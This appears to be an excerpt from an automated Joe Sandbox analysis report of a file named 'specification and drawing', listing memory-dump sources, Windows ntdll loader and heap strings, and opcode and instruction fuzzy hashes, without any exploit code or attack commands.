                                                                                                          • LdrpCheckRedirection, xrefs: 0114488F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-3154609507
                                                                                                          • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                                                                          • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
                                                                                                          • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                                                                          • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-2558761708
                                                                                                          • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                                                                          • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                                                                                          • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                                                                          • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                                                                                          Strings
                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                                                                          • LdrpInitializationFailure, xrefs: 011420FA
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2986994758
                                                                                                          • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                                                                          • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                                                                                          • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                                                                          • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: #%u
                                                                                                          • API String ID: 48624451-232158463
                                                                                                          • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                                                                          • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                                                                                          • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                                                                          • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                                                                                          Strings
                                                                                                          • LdrResSearchResource Exit, xrefs: 010CAA25
                                                                                                          • LdrResSearchResource Enter, xrefs: 010CAA13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                          • API String ID: 0-4066393604
                                                                                                          • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                                                                          • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                                                                                          • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                                                                          • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `$`
                                                                                                          • API String ID: 0-197956300
                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                          • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                          • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Legacy$UEFI
                                                                                                          • API String ID: 2994545307-634100481
                                                                                                          • Opcode ID: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                                                                          • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                                                                                          • Opcode Fuzzy Hash: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                                                                          • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$MUI
                                                                                                          • API String ID: 0-17815947
                                                                                                          • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                                                                          • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                                                                                          • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                                                                          • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                                                                                          Strings
                                                                                                          • kLsE, xrefs: 010C0540
                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                          • API String ID: 0-2547482624
                                                                                                          • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                                                                          • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                                                                                          • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                                                                          • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                                                                                          Strings
                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                          • API String ID: 0-2876891731
                                                                                                          • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                                                                          • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                                                                                          • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                                                                          • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                          • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                                                                          • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                                                                                          • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                                                                          • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: MUI
                                                                                                          • API String ID: 0-1339004836
                                                                                                          • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                                                                          • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                                                                                          • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                                                                          • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID: 0-3916222277
                                                                                                          • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                                                                          • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                                                                                          • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                                                                          • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: GlobalTags
                                                                                                          • API String ID: 0-1106856819
                                                                                                          • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                          • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                                                                                          • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                          • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .mui
                                                                                                          • API String ID: 0-1199573805
                                                                                                          • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                          • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                                                                                          • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                          • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EXT-
                                                                                                          • API String ID: 0-1948896318
                                                                                                          • Opcode ID: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                                                                          • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                                                                                          • Opcode Fuzzy Hash: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                                                                          • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AlternateCodePage
                                                                                                          • API String ID: 0-3889302423
                                                                                                          • Opcode ID: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                                                                                          • Instruction ID: b882abdd69a6375e2f7a97e3dcdb4137282613ad1e18789ced7201ad5ccf81a7
                                                                                                          • Opcode Fuzzy Hash: f0ce0bd84f33ae8c6a34b0c700cdb040c3d011cbd3e672af2a6164731f253f05
                                                                                                          • Instruction Fuzzy Hash: 5A41D172D01249EAEF29DB98DC80AEEFBF8FF84310F14416AE511E7254D7709A41CB51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryHash
                                                                                                          • API String ID: 0-2202222882
                                                                                                          • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                                                                          • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                                                                                          • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                                                                          • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #
                                                                                                          • API String ID: 0-1885708031
                                                                                                          • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                                                                          • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                                                                                          • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                                                                          • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: BinaryName
                                                                                                          • API String ID: 0-215506332
                                                                                                          • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                                                                          • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                                                                                          • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                                                                          • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                                                                                          Strings
                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                          • API String ID: 0-702105204
                                                                                                          • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                                                                          • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                                                                                          • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                                                                          • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                                                                          • Instruction ID: 8577386e80d39f9c20ac103bde51bb56b125614b9f567ae5bfdb2c227e7857ed
                                                                                                          • Opcode Fuzzy Hash: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                                                                          • Instruction Fuzzy Hash: E042D3726083418FD72DCF68C890A6BBBEDBF98344F08492DFA8297250D776D855CB52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                                                                          • Instruction ID: d2d816ac356c10d0cbd6d0e3628a7f49c0efa97e93ad366dfe22f6b2cb58af1f
                                                                                                          • Opcode Fuzzy Hash: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                                                                          • Instruction Fuzzy Hash: 28425F75E10219CFEB69CF6AC841BADBBF5BF48300F148099E999EB242D7349981CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                                                                          • Instruction ID: 455f228e57c7c9f7d7138e442dfc08df34fa312ed0441b2609d4a40131e8e25c
                                                                                                          • Opcode Fuzzy Hash: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                                                                          • Instruction Fuzzy Hash: DA32DE70A007658FEB2DCF69C8447BEBBF2BF84304F24411DD9969B285DB75A862CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                                                                          • Instruction ID: e43e73ef3c5ac9072131184fbfed59b86dd4aee8e763913c270d8bf738f93453
                                                                                                          • Opcode Fuzzy Hash: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                                                                          • Instruction Fuzzy Hash: B222D4702046618FE72DCF2DE490372BBF9AF45304F098459D9969F286D737E862CB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                                                                                          • Instruction ID: ae0d8c9b8670f61856a08450b13d601b490642bd0c72f339c43be4dfa136feb0
                                                                                                          • Opcode Fuzzy Hash: db2775f6b68cd44549432960a10acfd32407b3a8a5b41b6f877a6b469316f1aa
                                                                                                          • Instruction Fuzzy Hash: D3225C70E0422A9FCF19CF9AD4849FEFBF2AF44304B15805AE9859B241E734DD51CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                                                                          • Instruction ID: bbb48cb9698bb9d3b53bd70429b14b830745d5b5c8312fa43f0adda341880b1f
                                                                                                          • Opcode Fuzzy Hash: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                                                                          • Instruction Fuzzy Hash: 6A329C70A04215DFDB29CF68C480AAEBBF2FF48710F24456EE995AB391D731A851CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                          • Instruction ID: 4ad29277baf7fad50c0ef3383d6727afdd93d276d1d78c6d643163e84744938e
                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                          • Instruction Fuzzy Hash: 64F19F71E0421A9FDF19DF9AC884BAEBBF5AF48710F048169E985EB340E775D841CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                                                                          • Instruction ID: e1339d89489e69a7fc8dc2c48ec6d6108c01e7209805705029c3f6b6bee818bc
                                                                                                          • Opcode Fuzzy Hash: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                                                                          • Instruction Fuzzy Hash: 6CD1EF71E0060ACFDF4DCF6AC841AFEB7F5AF88304F198169D965A7281E735E9058B60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                                                                          • Instruction ID: 4e4fcbe505c9d4a8a7a07bc341419cf22527eb4198a0fae6efeadee6a9e6272d
                                                                                                          • Opcode Fuzzy Hash: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                                                                          • Instruction Fuzzy Hash: 03E16C715083429FC725CF28C490A6EBBE0FF89714F158A6DE99987351EB32E905CF92
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
